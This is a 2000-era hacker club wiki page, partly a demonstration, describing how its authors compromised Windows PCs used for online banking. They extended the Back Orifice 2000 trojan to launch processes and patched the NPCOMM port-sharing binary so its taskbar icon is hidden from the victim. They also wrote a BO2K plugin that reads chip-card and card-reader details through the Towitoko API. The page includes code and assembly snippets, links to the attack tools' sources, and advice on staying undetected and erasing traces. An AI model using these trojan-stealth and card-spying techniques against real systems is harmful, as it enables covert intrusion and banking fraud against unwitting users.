..:: c 3 f 2 m ::..
Zuletzt angesehen: » treffen » irc » faq » start » hotspot » projekte » impressum » side_aspects

Navigation

z.Z. sind 20 Leute im Chat.
Letztes Posting auf die Mailingliste:
03.02.2012 14:43
Das ist 2 Tage her.

Fun with internet banking

side aspects

As the security gap is clearly visible, compromising a Windows system will be just a matter of patience, creativity and skill.

Not giving you a complete toolbox at your hands, we will rather show some of the technical problems we encountered, and how we delt with the challenge. Every programmer with the attributes mentioned above should be able to meet this challenge in one, or the other way.

Extending the BO2K server

We decided to use Back Orifice 2000 (which will be abbreviated BO2K in the sequel) to demonstrate the attack. Well, we will not discuss the pros and cons of various remote software at this point. Of course, you can use what ever you like. BO2K did a perfect job, except for some points: Listing processes on NT and generally starting a process. Whereas first aspect can be circumvented by literally telling BO2K the victim's machine name (the default lets BO2K crash on NT), the latter is absoluteley necessary to execute the port sharing software.

The reason why the process starter did not work was simple - it has been left out in the fuction stub of the public BO2K server sources. Adding the missing execute code to the server sources is really simple, provided you have a compiler, available. A call from the WIN Api did the job: 

          File (...)/src/commands/process/cmd_process.cpp
          Function: CmdProc_ProcessSpawn ()
          CreateProcess (svArg2, NULL, NULL, NULL,
                      true, NULL, NULL, NULL, &sinfo, &pinfo);

Here is our diff against the origial source tree.

Note that these patches are obsolete. You should rather visit the bo2k devel tree which can be downloaded from cvs.bo2k.sourceforge.net.

Of course, instead of mending the BO2K core, we could also have written a plugin, which is not really hard, either as cDc has provided the templates, already.

Supporting NPCOMM with a new feature

As with BO2K, the program NPCOMM was our choice for the attack - with a little flaw in a well desigend attack: it shows an icon on the taskbar with an options menu that can be activated the right mouse button. For perfectness, this feature had to swiched off. Needless to say, that no real victim would have realized that little item malicious.

Now, debugging binaries is somehow more an art than a science. And it is up to you which debugger to use and how to solve such a problem. Stepping through the code of PortServ.exe (which is part of NPCOMM and the only program needed on the victims side) you will find a sequence like: 

          
          ...
          XOR ESI,ESI
          PUSH ESI
          PUSH 00410D12
          PUSH EAX
          PUSH DWORD PTR [EBP+08]
          CALL 0041978A
          ...

Ok, as you might guess, the taskbar icon and menue gets plugged in at this point. Well, you have two possibilities: The first is to modify this passage to not plug in the routine. Sounds easy until you realize that you'll have to clean up the stack by hand and in addition, you have to provide valid return parameters.

The smarter way is to modify the routine which gets plugged in. In our example starting at address 0x410d12, doing some stuff of minor interest (like displaying the things we don't want to see), it ends up cleanly at address 0x410d4c with: 

          XOR EAX,EAX
          RET 0010

The job now is as simple as placing a jmp at the start of the plugin pointing back to the point where the routine was left.

Feel free to donwload our little PsStealth patcher source code, or browse the developer tree. Information gathering on the chip card and the reader

As experience showed us, all banking institutes are using the card reader from Towitoko - and all install Towitoko's universal card API Dll. Using this feature together with BO2K, you can easily write a plugin that spies out informations about card and reader, like:

card-reader info
          Status=valid
          Port=COM2
          Type=CHIPDRIVE micro
          ShortName=CDM
          Version=4.3
          LotNr=9853
          Serial=2836
          MaxBaudrate=115200
          Baudrate=115200
          PrID=2/0
          Caps=MEM,CPU,
          Index=0
          Mode=auto
          PowerFail=0
          SCARD command executed.

or chipcard-info (well, here a german telephone-card): 

          Status=active
          LockedBy=0,-
          Type=SLE4436
          Protocol=ATR
          Apps=TWK,
          CardCount=1
          CardPower=0
          MemSize=64
          AtrBinarySize=4
          AtrBinary=1B F4 3F 54
          SCARD command executed.

A plugin template that is available as source code was mentioned earlier, already. It simply has to be filled in.

Feel free to download our botowi plugin source code for BO2K, or browse the developer tree.

Some generel remarks

A real attacker needs to be inivisible and to remain undetected. Keep in mind that neither the port sharer nor the Towitoko api are optimized as trojans. They consume system ressources at large and may print unwanted error messages on the victims's PC due to system inconsistencies and interferences with other programs.

So a real attacker will finish up any of those programs as soon as possible, once he has got what he wants. He may even destroy the malicious programs that serverd the attacker wiping out every trace.

tom Last modified: Mon May 1 17:37:57 CEST 2000

Brought back to your friendly attention by hp 2010/05/03 17:10

Zuletzt geändert: 2010/05/03 17:54